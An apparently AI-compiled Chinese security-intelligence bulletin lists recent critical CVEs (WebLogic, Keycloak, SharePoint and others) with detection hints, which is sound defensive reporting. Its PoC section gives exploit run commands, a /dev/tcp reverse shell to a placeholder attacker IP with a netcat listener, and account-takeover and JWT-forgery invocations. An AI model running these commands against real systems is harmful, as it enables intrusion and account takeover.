每日安全情报报告
由 AI 整理发布
覆盖近 48 小时新增高危漏洞、公开 PoC 与安全情报文章(数据截至 2026-08-26)
风险等级:🔴 严重 | 🟠 高危 | 🟡 中危 | 🟢 低危
一、最新高危漏洞(近 24--48 小时)
标注 ★ 为 CISA KEV 在野利用项;标注 ⚡ 为近 48 小时内新增 / 公开 PoC。
🔴 严重(在野利用 / KEV)
1. CVE-2026-21962 --- Oracle HTTP Server / WebLogic Server Proxy Plug-in 访问控制绕过
-
风险级别 :🔴 严重(CVSS 10.0)
-
漏洞类型 : improper access control(CWE-284,可视为未认证 RCE / 数据完全访问)
-
受影响组件 :Oracle HTTP Server 12.2.1.4.0 / 14.1.1.0.0 / 14.1.2.0.0;Oracle WebLogic Server Proxy Plug-in(Apache & IIS)对应版本
-
在野利用 :★ CISA 于 2026-08-24 新增至 KEV,联邦修复截止 2026-08-27 ;GreyNoise / CloudSEK 观察到针对蜜罐的持续攻击(与 CVE-2020-14882 等老旧 WebLogic RCE 同批出现)
-
说明 :未经认证的远程攻击者可通过路径遍历与请求头操纵绕过代理访问控制,直达后端 WebLogic 实例,实现任意数据的增删改与完全访问
-
参考链接:NVD 漏洞详情 | CISA KEV 目录 | Oracle 官方安全公告(CPU Jan 2026) | PoC 仓库 Ashwesker
2. CVE-2026-18963 --- Keycloak reset-credentials 绕过 → 未认证账户接管
-
风险级别 :🔴 严重(CVSS 9.1)
-
漏洞类型 :弱密码恢复机制(CWE-640),认证绕过
-
受影响组件 :Red Hat Build of Keycloak < 26.4.15 / 26.6.x < 26.6.12(容器镜像)/ 上游 Keycloak < 26.7.2
-
在野利用 :⚡ 2026-08-18 披露,多份公开 PoC 于 2026-08-20~25 流出(尚未列入 KEV,但 NVD SSVC 评为可自动化利用)
-
说明 :未认证攻击者通过构造
tryAnotherWay请求制造粘性会话状态,跳过邮件验证步骤,直接为任意用户(含管理员)重置密码并完全接管账户 -
参考链接:NVD 漏洞详情 | Red Hat 安全公告 | GHSA-4gv3-mc9p-5wqc | PoC 仓库 gman0x00 | PoC 仓库 Snizi
3. CVE-2026-55040 + CVE-2026-63520 --- SharePoint JWT 绕过 → 未认证 RCE
-
风险级别 :🔴 严重(CVSS 9.1 / 链式 RCE)
-
漏洞类型 :JWT 令牌验证绕过(认证绕过)→ 链式 .NET 类型实例化 RCE
-
受影响组件 :Microsoft SharePoint Server 2016 / 2019 / Subscription Edition
-
在野利用 :★ KEV(2026-08-18 新增,截止 2026-08-21),VulnCheck 已发布可链成未认证 RCE 的可用利用;至少 8,500 台公网 SharePoint 服务器受影响
-
说明 :攻击者读取 STS 签名证书后伪造
alg:noneJWT,冒充任意站点用户 / 管理员;结合 CVE-2026-63520 可达未认证远程代码执行 -
参考链接:NVD 漏洞详情 CVE-2026-55040 | Microsoft MSRC 补丁指南 | Rapid7 技术分析 | PoC 仓库 sfewer-r7
🟠 高危(近期新增 / 含公开 PoC)
4. CVE-2026-66897 --- Canonical LXD 实例模板路径遍历容器逃逸
-
风险级别 :🟠 高危(CVSS 9.9)
-
说明 :实例模板处理中的路径遍历允许具备容器编辑权限 / 可提交 crafted 镜像的用户以 root 覆写宿主机任意文件,构成彻底破坏容器---宿主机隔离边界的容器逃逸
-
参考链接:Enigma 8/25 日报(披露详情)
5. CVE-2026-78265 --- WordPress The Events Calendar 未认证 PHP 对象注入
-
风险级别 :🟠 高危(CVSS 9.8)
-
受影响组件 :The Events Calendar 插件 ≤ 6.17.2(百万级安装量)
-
说明 :未认证 PHP 对象注入,配合可用 gadget chain 可远程代码执行;插件安装基数庞大,预计短期内遭大规模利用
-
参考链接:Enigma 8/25 日报
6. CVE-2026-31694 --- Linux FUSE page cache 本地权限提升
-
风险级别 :🟠 高危(FreeBuf 已复现,PoC 与细节已公开)
-
受影响组件 :Linux Kernel 6.15./ 6.16. / 6.17./ 6.18. ≤ 6.18.25 / 7.0.≥ 7.0.2 / ≥ 7.1
- 说明 *:FUSE readdir 缓存写入 page cache 前未拒绝超大目录项,造成受控越界写,本地低权限用户可完全接管系统;需启用 FUSE 且攻击者能挂载恶意 FUSE 文件系统 -
参考链接:FreeBuf 已复现分析 | 上游修复补丁说明
7. DrayTek VigorAP / VigorSwitch 预认证命令注入(多 CVE)
-
风险级别 :🟠 高危(最高 CVSS 9.8)
-
说明 :NCSC-FI 披露多款 VigorAP / VigorSwitch 存在预认证命令注入,攻击者可通过构造网络请求以 root 执行任意命令;DrayTek 长期为僵尸网络与 APT 重点目标,需紧急升级固件
8. Zscaler Client Connector 认证绕过 + RCE
-
风险级别 :🟠 高危
-
说明 :NCSC-FI 披露 ZCC 与客户端连接器门户之间的认证绕过及远程代码执行能力;作为零信任架构的安全关键组件,该缺陷直接削弱其访问控制
9. miniOrange 插件认证绕过(CVE-2026-61979 + CVE-2026-15981 / Joomla CVE-2026-77995)
-
风险级别 :🟠 高危(在野扫描中)
-
说明 :WordPress 站点遭 miniOrange 插件链式利用绕过认证,PoC 已公开并出现主动扫描;相关 Joomla 漏洞 CVE-2026-77995 可通过 Cookie 操纵实现任意账户接管
10. 其他近期高危披露(Tenable 2026-08-25 更新)
-
CVE-2026-80186 --- BlueZ(Linux 蓝牙协议栈)栈溢出,蓝牙射频范围内可触发 DoS 甚至 RCE(CVSS 高危)
-
CVE-2026-80182 / CVE-2026-80184 --- OpenStack Keystone 委托令牌越权,可突破项目边界创建长期凭据
-
CVE-2026-9254 --- TP-Link Archer BE800 / BE3600 / AX75 家长控制 OS 命令注入(LAN 内 root)
-
CVE-2026-9127 / CVE-2026-9128 / CVE-2026-9108 --- Rockwell Studio 5000 Logix Designer 代码执行 / 路径遍历
-
参考链接:Tenable CVE 更新列表
持续在野提醒 :Zimbra CVE-2026-73570(CVSS 8.9,SMTP→SNMP 命令注入)KEV 截止日 2026-08-24 已过,Shadowserver 报告至少 274 台 公网 Zimbra 实例已被攻陷;未打补丁(ZCS 10.1.20)实例应按已被入侵处置。参考:CyberRecaps 8/25 报道
二、最新漏洞 PoC(含使用步骤)
⚠️ 以下 PoC 仅供授权环境下的防御验证、检测工程与安全研究使用;对他人系统运行可能违法。
⚡ PoC 1 --- Oracle WebLogic CVE-2026-21962(未认证 RCE)
bash
# 步骤 1:克隆 PoC 仓库
git clone https://github.com/Ashwesker/Ashwesker-CVE-2026-21962.git
cd Ashwesker-CVE-2026-21962
# 步骤 2:运行(需 Python 3,无额外依赖)
# 基础命令执行测试
python3 CVE-2026-21962.py http://target:7001 "id && whoami && uname -a"
# 反向 shell(先在攻击机监听:nc -lvnp 4444)
python3 CVE-2026-21962.py http://target:7001 "bash -i >& /dev/tcp/YOUR_IP/4444 0>&1"
- 检测要点:在 Apache/IIS 访问日志中检索
/weblogic/、/wl_proxy/、/bea_wls_internal/、/_proxy/、/proxy/及注入头WL-Proxy-Client-IP/Proxy-Client-IP/X-Forwarded-For - 来源:PoC 仓库 | 端点狩猎建议(DugganUSA)
⚡ PoC 2 --- Keycloak CVE-2026-18963(reset-credentials 绕过接管账户)
bash
# 步骤 1:克隆 PoC 仓库(自带 Docker 实验环境)
git clone https://github.com/gman0x00/keycloak-CVE-2026-18963.git
cd keycloak-CVE-2026-18963
# 步骤 2:启动受影响版本实验环境(Keycloak 26.6.2)
docker compose up -d
curl http://127.0.0.1:8080
# 步骤 3:安装依赖并运行接管利用(需 Python 3)
pip install requests
python3 Keycloak_CVE_2026_18963.py http://127.0.0.1:8080 \
--realm <realm> --username <victim> --new-password '' \
--allow-loopback-http-cookie --change-password
- 检测信号:无对应邮件点击事件却出现
UPDATE_PASSWORD;/login-actions/reset-credentials带tryAnotherWay=yes;emailVerified被置 true 但无VERIFY_EMAIL事件 - 来源:PoC 仓库 gman0x00 | PoC 仓库 Snizi/Anhquan | Wiz 漏洞分析
⚡ PoC 3 --- SharePoint CVE-2026-55040(JWT 绕过 → 冒充管理员)
bash
# 步骤 1:克隆 Rapid7 官方 PoC 仓库
git clone https://github.com/sfewer-r7/CVE-2026-55040.git
cd CVE-2026-55040
# 步骤 2:安装依赖(Python 3,需 pyjwt / requests)
pip install pyjwt requests
# 步骤 3:以目标站点管理员身份伪造 JWT(支持 SID / UPN)
python3 CVE_2026_55040.py --target https://victim-sharepoint \
--user S-1-5-21-xxx-500
- 漏洞根因(四弱点链):
RequireSignedTokens=false→ 从x5t头取 STS 证书指纹且不验签 → issuer 校验接受未注册证书 →GetTokenSignature仅检查非空。利用后IsSiteAdmin:true,可读取 / 篡改全站文档。配套链式漏洞 CVE-2026-63520 可进一步达成未认证 RCE - 来源:PoC 仓库 sfewer-r7 | Rapid7 技术分析 | Help Net Security 报道
🔧 PoC 4 --- LXD 受限项目逃逸(CVE-2026-34177,配置型验证 / 加固)
bash
# 受影响:LXD 受限项目(restricted=true 默认开启 virtual-machines.lowlevel=block)
# 弱点:isVMLowLevelOptionForbidden 遗漏 raw.apparmor 与 raw.qemu.conf
# 验证 / 防御命令(在 LXD 宿主机执行,检查受限项目是否可被逃逸):
lxc project list # 确认是否存在 restricted=true 项目
lxc config show <vm> --project <p> # 检查是否出现 raw.apparmor / raw.qemu.conf 注入
# 缓解:升级至已修复版本
# LXD 6.7(interim) / 5.21.4 LTS / 5.0.6
# 临时缓解:在 isVMLowLevelOptionForbidden 禁用列表中补充 raw.apparmor、raw.qemu.conf
🧪 其他公开 PoC / 利用提醒
- WordPress The Events Calendar CVE-2026-78265 :PoC 已公开,建议立即升级至 > 6.17.2(详情)
- DrayTek VigorAP / VigorSwitch :升级厂商固件,管理接口仅对可信网络开放(详情)
- PostgreSQL CVE-2026-14669 (to_char 堆溢出,CVSS 8.8,PoC 已公开):升级至 18.5 / 17.11 / 16.15 / 15.19 / 14.24 及以上(安恒威胁情报公告)
三、网络安全最新文章
-
Oracle WebLogic RCE 在野利用,CISA 将其纳入 KEV --- The Hacker News(2026-08-25)
-
Keycloak 密码重置漏洞允许攻击者接管任意账户(CVE-2026-18963) --- The Hacker News(2026-08-25)
-
每日网络安全简报(2026-08-25):伊朗关联黑客致英国电厂停摆、SharePoint RCE 链在野、Keycloak 接管 --- CyberSecBrief
-
每日威胁情报摘要(2026-08-25):LXD 逃逸、WordPress The Events Calendar、DrayTek、Zscaler、miniOrange 等 --- Enigma Global
-
【已复现】Linux FUSE page cache 本地权限提升漏洞(CVE-2026-31694) --- FreeBuf(2026-08-25)
-
CVE-2026-50353 --- Windows DirectX 内核驱动 Use-After-Free 漏洞分析 --- FreeBuf
-
网络安全日报 2026-08-25(Entra ID 在野、Rust 供应链、Keycloak 等) --- 蚁景网安实验室
-
CISA 将 Oracle 代理漏洞纳入 KEV:攻击机比目录早 16 天捕获 4 个公开 PoC --- DugganUSA(端点狩猎建议)
部分内容由 AI 辅助生成